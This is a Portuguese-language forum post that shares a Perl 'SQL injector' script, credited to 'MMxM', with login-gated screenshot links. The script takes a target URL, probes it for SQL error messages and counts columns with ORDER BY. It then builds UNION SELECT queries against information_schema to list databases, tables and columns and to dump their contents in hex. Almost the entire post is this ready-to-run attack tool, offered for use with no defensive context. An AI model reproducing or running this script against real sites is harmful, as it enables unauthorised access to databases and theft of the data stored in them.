Script Beta , algumas imagens mostrando o funcionamento:
Passo-1: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Passo-2: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Passo-3: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Passo-4: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Passo-1: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Passo-2: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Passo-3: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Passo-4: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
- Código:
#!/usr/bin/perl
###############################
### X_SQL INJECTOR V0.0.0.1 ###
###############################
###
# Coder:MMxM
# Blog: http://the-blackhats.blogspot.com
# Subscribe: http://youtube.com/user/123456789101161
###
# Versao Beta , nao se esqueca que e beta e por isso esta sujeito a (muitos) errors , na versao 0.0.0.2 , vai ser melhor '-'
###
# @Gr33tz(Cyclone , Ut0p|4 , Hacker Fts315 , N3tt3rz , c0de_universal)
###
use strict;
use warnings;
use LWP;
if($#ARGV != 0){
print '
X_SQL INJECTOR V0.1 By MMxM [http://the-blackhats.blogspot.com]
Como usar: x_sql.pl <url-vull>
exemplo: x_sql.pl http://localhost/sqli.php?id=1
';
exit
}
my $url = $ARGV[0];
if($url !~ /^http:\/\//){
$url = 'http://'.$url;
}
print '
X_SQL INJECTOR V0.0.0.1 *-* BY MMxM
Site a ser analisado: '.$url;
my $target = $url;
&vuln();
my $inject = &inject();
print '
[*] Selecione:
[1] Descobrir nome dos databases
[2] Descobrir tabelas de um database
[3] Descobrir colunas de uma tabela
[4] Dumpar conteudo das colunas
>> ';
chomp(my $op = <stdin>);
if($op == 1){
&db_dumper();
} elsif($op == 2){
print 'Digite o nome do database: ';
chomp(my $database = <stdin>);
$database = '0x'.&hex($database);
&table_dumper($database);
} elsif($op == 3){
print 'Digite o nome do database: ';
chomp(my $database = <stdin>);
$database = '0x'.&hex($database);
print 'Digite o nome da tabela: ';
chomp(my $tabela = <stdin>);
$tabela = '0x'.&hex($tabela);
&columns_dumper($database,$tabela);
} elsif($op == 4){
print 'Digite o nome do database: ';
chomp(my $database = <stdin>);
print 'Digite o nome da tabela: ';
chomp(my $tabela = <stdin>);
print 'Digite o nome da coluna: ';
chomp(my $coluna = <stdin>);
&dumper_dumper($database,$tabela,$coluna);
} else {
die("[-] OPCAO INVALIDA ");
}
sub connect(){
my $ua = new LWP::UserAgent;
$ua->agent('Mozilla/5.5 (compatible; MSIE 5.5; Windows NT 5.1)');
$ua->timeout(15);
my $request = HTTP::Request->new('GET');
$request->url($target);
my $response = $ua->request($request);
my $code = $response->code;
if($code != 200){
die '[-] Request erro: status code '. $code;
}
my $headers = $response->headers_as_string;
my $body = $response->content;
return $body;
}
sub vuln(){
$target = $target."'";
if(&connect($target) =~ /You have an error in your SQL syntax/i){
print "\n[+] Site possivelmente vulneravel\n";
} else {
die("\nSite aparentemente sem erros\n");
}
}
sub columns(){
print "\n[*] Verificando colunas ...\n";
foreach my $a (1..100){
$target = $url." order by ".$a."--";
if(&connect($target) =~ /Unknown column/i){
print '[+] O alvo parece ter '. ($a-1) .' colunas !!!';
return ($a-1);
last;
}
}
}
sub inject(){
my $n = &columns();
my $un = '';
foreach my $c(1..$n)
{
$un.="$c,";
}
$un =~ s/(.*?),/concat(0x6d6d786d,...INJECTION...,0x6d6d786d),/g;
$un =~ s/,$//g;
return $un;
}
sub count_db(){
my $dbs_count = $inject;
$dbs_count =~ s/...INJECTION.../count(*)/g;
$target = "$url union all select $dbs_count from information_schema.schemata--";
$target =~ s/=/=-/g;
if(&connect($target) =~ /mmxm(.*)mmxm/){
return $1;
} else {
die("\n[-]Erro ao descobrir numeros de databases\n");
}
}
sub db_dumper(){
my $db_number = &count_db();
print "\n[+] Numeros de databases: $db_number\n\n";
my $dbss = $inject;
$dbss =~ s/...INJECTION.../schema_name/g;
foreach my $dbs(1..$db_number){
$target = "$url union all select $dbss from information_schema.schemata LIMIT $dbs,1";
$target =~ s/=/=-/g;
if(&connect($target) =~ /mmxm(.*)mmxm/){
print "[*] $1\n";
}
}
print "\n";
}
sub count_table(){
my $database = shift;
my $table_count = $inject;
$table_count =~ s/...INJECTION.../count(*)/g;
$url =~ s/=/=-/g;
$target = "$url union all select $table_count from information_schema.tables where table_schema=$database--";
if(&connect($target) =~ /mmxm(.*)mmxm/){
return $1;
} else {
die("\n[-]Erro ao descobrir numeros de tabelas\n");
}
}
sub table_dumper(){
my $database = shift;
my $table_number = &count_table($database);
print "\n[+] Numeros de Tabelas: $table_number\n\n";
my $table = $inject;
$table =~ s/...INJECTION.../table_name/g;
$url =~ s/=/=-/g;
foreach my $tables(1..$table_number){
$target = "$url union all select $table from information_schema.tables where table_schema=$database LIMIT $tables,1";
if(&connect($target) =~ /mmxm(.*)mmxm/){
print "[*] $1\n";
}
}
print "\n";
}
sub count_columns(){
my $database = shift;
my $tabela = pop;
my $column_count = $inject;
$column_count =~ s/...INJECTION.../count(*)/g;
$url =~ s/=/=-/g;
$target = "$url union all select $column_count from information_schema.columns where table_schema=$database and table_name=$tabela--";
if(&connect($target) =~ /mmxm(.*)mmxm/){
return $1;
} else {
die("\n[-]Erro ao descobrir numeros de colunas\n");
}
}
sub columns_dumper(){
my $database = shift;
my $tabela = pop;
my $column_number = &count_columns($database,$tabela);
print "\n[+] Numeros de colunas: $column_number\n\n";
my $columnss = $inject;
$columnss =~ s/...INJECTION.../column_name/g;
$url =~ s/=/=-/g;
foreach my $column(1..$column_number){
$target = "$url union all select $columnss from information_schema.columns where table_schema=$database AND table_name=$tabela LIMIT $column,1";
if(&connect($target) =~ /mmxm(.*)mmxm/){
print "[*] $1\n";
}
}
print "\n";
}
sub count_dumper(){
my $dumper_count = $inject;
$dumper_count =~ s/...INJECTION.../count($_[2])/g;
$url =~ s/=/=-/g;
$target = "$url union all select $dumper_count from $_[0].$_[1]--";
if(&connect($target) =~ /mmxm(.*)mmxm/){
return $1;
} else {
die("\n[-]Erro ao descobrir numeros de colunas\n");
}
}
sub dumper_dumper(){
my $dumper = &count_dumper($_[0],$_[1],$_[2]);
print "\n\n[+] Numeros de entradas: $dumper\n\n";
my $dm = $inject;
$dm =~ s/...INJECTION.../hex($_[2])/g;
$url =~ s/=/=-/g;
foreach my $dmp(1..$dumper){
$target = "$url union all select $dm from $_[0].$_[1] LIMIT $dmp,1";
if(&connect($target) =~ /mmxm(.*)mmxm/){
my $o = pack("H*",$1);
print "[*] $o\n";
}
}
print "\n";
}
sub hex(){
my $enc = unpack("H*",shift);
return $enc;
}